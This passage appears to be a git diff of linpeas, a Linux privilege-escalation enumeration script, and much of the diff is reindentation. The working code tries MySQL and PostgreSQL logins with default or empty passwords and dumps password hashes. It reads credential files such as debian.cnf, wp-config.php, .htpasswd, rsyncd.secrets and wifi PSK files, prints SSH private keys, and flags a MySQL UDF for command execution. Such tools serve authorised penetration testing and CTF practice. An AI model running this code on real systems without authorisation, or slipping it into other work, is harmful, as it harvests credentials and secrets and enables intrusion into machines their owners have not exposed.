do - if [ -r "$f" ]; then - echo "Found readable $f" - grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," - fi - done - mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") - if [ "$mysqlexec" ]; then - echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... " +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" fi done - else echo_not_found - fi - echo "" + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" - print_2title "Analyzing MariaDB Files (limit 70)" + print_2title "Analyzing MariaDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"mariadb\.cnf$\"`" ]; then echo_not_found "mariadb.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "mariadb\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,mariadb\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_MARIADB\" | grep -E \"debian\.cnf$\"`" ]; then echo_not_found "debian.cnf"; fi; printf "%s" "$PSTORAGE_MARIADB" | grep -E "debian\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,debian\.cnf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "user.*|password.*" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PostgreSQL Files (limit 70)" + print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then echo_not_found "pgadmin*.db"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then echo_not_found "pg_hba.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; @@ -2441,37 +2403,37 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then echo_not_found "pgsql.conf"; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - #-- SI) PostgreSQL brute - if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. - #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this - print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " - if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " - if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - echo "" +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no fi - print_2title "Analyzing Mongo Files (limit 70)" + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + + print_2title "Analyzing Mongo Files (limit 70)" echo "Version: $(warn_exec mongo --version 2>/dev/null; warn_exec mongod --version 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_MONGO\" | grep -E \"mongod.*\.conf$\"`" ]; then echo_not_found "mongod*.conf"; fi; printf "%s" "$PSTORAGE_MONGO" | grep -E "mongod.*\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,mongod.*\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#"; done; echo ""; - print_2title "Analyzing Apache Files (limit 70)" + print_2title "Analyzing Apache Files (limit 70)" echo "Version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)" print_3title 'PHP exec extensions' grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null @@ -2480,70 +2442,70 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_APACHE\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_APACHE" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E allow_ | grep -Ev "^;" | sed -${E} "s,On,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Tomcat Files (limit 70)" + print_2title "Analyzing Tomcat Files (limit 70)" if ! [ "`echo \"$PSTORAGE_TOMCAT\" | grep -E \"tomcat-users\.xml$\"`" ]; then echo_not_found "tomcat-users.xml"; fi; printf "%s" "$PSTORAGE_TOMCAT" | grep -E "tomcat-users\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,tomcat-users\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username=|password=" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - - print_2title "Analyzing FastCGI Files (limit 70)" + + print_2title "Analyzing FastCGI Files (limit 70)" if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then echo_not_found "fastcgi_params"; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Http conf Files (limit 70)" + print_2title "Analyzing Http conf Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then echo_not_found "httpd.conf"; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Htpasswd Files (limit 70)" + print_2title "Analyzing Htpasswd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then echo_not_found ".htpasswd"; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing PHP Sessions Files (limit 70)" + print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions if ! [ "`echo \"$PSTORAGE_PHP_SESSIONS\" | grep -E \"sess_.*$\"`" ]; then echo_not_found "sess_*"; fi; printf "%s" "$PSTORAGE_PHP_SESSIONS" | grep -E "sess_.*$" | while read f; do ls -ld "$f" | sed -${E} "s,sess_.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; - print_2title "Analyzing Wordpress Files (limit 70)" + print_2title "Analyzing Wordpress Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WORDPRESS\" | grep -E \"wp-config\.php$\"`" ]; then echo_not_found "wp-config.php"; fi; printf "%s" "$PSTORAGE_WORDPRESS" | grep -E "wp-config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,wp-config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "PASSWORD|USER|NAME|HOST" | sed -${E} "s,PASSWORD|USER|NAME|HOST,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Drupal Files (limit 70)" + print_2title "Analyzing Drupal Files (limit 70)" if ! [ "`echo \"$PSTORAGE_DRUPAL\" | grep -E \"settings\.php$\"`" ]; then echo_not_found "settings.php"; fi; printf "%s" "$PSTORAGE_DRUPAL" | grep -E "settings\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,settings\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix'" | sed -${E} "s,drupal_hash_salt|'database'|'username'|'password'|'host'|'port'|'driver'|'prefix',${SED_RED},g"; done; echo ""; - print_2title "Analyzing Moodle Files (limit 70)" + print_2title "Analyzing Moodle Files (limit 70)" if ! [ "`echo \"$PSTORAGE_MOODLE\" | grep -E \"config\.php$\"`" ]; then echo_not_found "config.php"; fi; printf "%s" "$PSTORAGE_MOODLE" | grep -E "config\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,config\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "dbtype|dbhost|dbuser|dbhost|dbpass|dbport" | sed -${E} "s,dbtype|dbhost|dbuser|dbhost|dbpass|dbport,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Supervisord Files (limit 70)" + print_2title "Analyzing Supervisord Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SUPERVISORD\" | grep -E \"supervisord\.conf$\"`" ]; then echo_not_found "supervisord.conf"; fi; printf "%s" "$PSTORAGE_SUPERVISORD" | grep -E "supervisord\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,supervisord\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "port.*=|username.*=|password.*=" | sed -${E} "s,port.*=|username.*=|password.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Cesi Files (limit 70)" + print_2title "Analyzing Cesi Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CESI\" | grep -E \"cesi\.conf$\"`" ]; then echo_not_found "cesi.conf"; fi; printf "%s" "$PSTORAGE_CESI" | grep -E "cesi\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,cesi\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "username.*=|password.*=|host.*=|port.*=|database.*=" | sed -${E} "s,username.*=|password.*=|host.*=|port.*=|database.*=,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Rsync Files (limit 70)" + print_2title "Analyzing Rsync Files (limit 70)" if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.conf$\"`" ]; then echo_not_found "rsyncd.conf"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,secrets.*|auth.*users.*=,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_RSYNC\" | grep -E \"rsyncd\.secrets$\"`" ]; then echo_not_found "rsyncd.secrets"; fi; printf "%s" "$PSTORAGE_RSYNC" | grep -E "rsyncd\.secrets$" | while read f; do ls -ld "$f" | sed -${E} "s,rsyncd\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Hostapd Files (limit 70)" + print_2title "Analyzing Hostapd Files (limit 70)" if ! [ "`echo \"$PSTORAGE_HOSTAPD\" | grep -E \"hostapd\.conf$\"`" ]; then echo_not_found "hostapd.conf"; fi; printf "%s" "$PSTORAGE_HOSTAPD" | grep -E "hostapd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,hostapd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,passphrase.*,${SED_RED},g"; done; echo ""; - #-- SI) Wifi conns - print_2title "Searching wifi conns file" - wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) - if [ "$wifi" ]; then - printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done - else echo_not_found - fi - echo "" +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" - print_2title "Analyzing Anaconda ks Files (limit 70)" + print_2title "Analyzing Anaconda ks Files (limit 70)" if ! [ "`echo \"$PSTORAGE_ANACONDA_KS\" | grep -E \"anaconda-ks\.cfg$\"`" ]; then echo_not_found "anaconda-ks.cfg"; fi; printf "%s" "$PSTORAGE_ANACONDA_KS" | grep -E "anaconda-ks\.cfg$" | while read f; do ls -ld "$f" | sed -${E} "s,anaconda-ks\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rootpw.*" | sed -${E} "s,rootpw.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing VNC Files (limit 70)" + print_2title "Analyzing VNC Files (limit 70)" if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; @@ -2551,23 +2513,23 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; - print_2title "Analyzing Ldap Files (limit 70)" + print_2title "Analyzing Ldap Files (limit 70)" echo "The password hash is from the {SSHA} to 'structural'" if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; - print_2title "Analyzing OpenVPN Files (limit 70)" + print_2title "Analyzing OpenVPN Files (limit 70)" if ! [ "`echo \"$PSTORAGE_OPENVPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPENVPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - #-- SI) ssh files - print_2title "Searching ssl/ssh files" - if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi - sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" - hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" - hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - print_2title "Analyzing SSH Files (limit 70)" + print_2title "Analyzing SSH Files (limit 70)" if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; @@ -2575,243 +2537,243 @@ if echo $CHECKS | grep -q SofI; then if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," - if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) - else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) - fi +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi - if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - echo "" - print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi - echo "" - fi - if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" - printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 - echo "" - fi - if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" - printf "$PSTORAGE_CERTSCLIENT\n" - echo "" - fi - if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" - printf "$PSTORAGE_SSH_AGENTS\n" - echo "" - fi - if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" - ssh-add -l - echo "" - fi - if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" - printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done - echo "" - fi - if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" - printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," - echo "" - fi - if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" - printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," - echo "" - fi - if [ "$sshconfig" ]; then - echo "" - echo "Searching inside /etc/ssh/ssh_config for interesting info" - grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," - fi +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo "" - - #-- SI) PAM auth - print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" - pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) - if [ "$pamssh" ]; then - grep -v "^#\|^@" 